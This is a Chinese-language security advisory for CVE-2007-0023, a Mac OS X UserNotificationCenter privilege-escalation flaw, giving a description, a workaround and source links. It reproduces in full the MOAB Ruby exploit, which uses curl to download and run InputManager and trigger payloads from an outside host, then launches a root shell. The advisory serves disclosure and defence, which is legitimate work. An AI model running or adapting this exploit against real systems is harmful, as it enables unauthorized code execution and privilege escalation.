安全研究

安全漏洞
Apple UserNotificationCenter本地权限提升漏洞

发布日期:2007-01-23
更新日期:2007-01-29

受影响系统:
Apple Mac OS X 10.4.8
描述:
BUGTRAQ  ID: 22188
CVE(CAN) ID: CVE-2007-0023

Mac OS X是苹果家族机器所使用的操作系统。

Mac OS X的UserNotificationCenter.app工具在权限处理上存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。

如果结合diskutil使用的话,Mac OS X的UserNotificationCenter.app中CFUserNotificationSendRequest函数在用户的主目录中以wheel组权限运行任意InputManager,这可能允许本地攻击者以wheel权限执行任意代码。

<*来源:LMH (lmh@info-pull.com
  
  链接:http://secunia.com/advisories/23846/
        http://projects.info-pull.com/moab/MOAB-22-01-2007.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
#                    Lance M. Havok   <lmh [at] info-pull.com>
# All pwnage reserved.
#
# "Exploit" for MOAB-22-01-2007: All your crash are belong to us.
#

require 'fileutils'

bugselected = (ARGV[0] || 0).to_i

INPUTMANAGER_URL    = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz"
INPUTMANAGER_PLANT  = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};"             +
                      "mkdir -p ~/Library/InputManagers/;"                                    +
                      "cd ~/Library/InputManagers/;"                                          +
                      "tar -zxvf /tmp/moab_im.tar.gz"

case bugselected
  when 0
    target_url  = "http://projects.info-pull.com/moab/bug-files/notification"
      trigger_cmd = "curl -o /tmp/notify #{target_url} ; /tmp/notify &"
  when 1
    target_url  = "http://projects.info-pull.com/moab/bug-files/pwned-ex-814.ttf"
      trigger_cmd = "/usr/bin/curl -o /tmp/pwned-ex-814.ttf #{target_url}; open /tmp/pwned-ex-814.ttf"
  when 2
    target_url  = "http://projects.info-pull.com/moab/bug-files/MOAB-10-01-2007.dmg.gz"
      trigger_cmd = "/usr/bin/curl -o /tmp/moab_dmg.gz #{target_url}; cd /tmp; gunzip moab_dmg.gz; open MOAB-10-01-2007.dmg"    
end

CMD_LINE = "#{INPUTMANAGER_PLANT} ; #{trigger_cmd}"

def escalate()
  puts "++ Welcome to Pwndertino..."
  system CMD_LINE
  sleep 5
  system "/Users/Shared/shX"
end

escalate()

http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz

建议:
临时解决方法:

* 限制对~/Library/InputManagers/的访问,禁止使用diskutil。

厂商补丁:

Apple
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.apple.com

浏览次数:2688
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客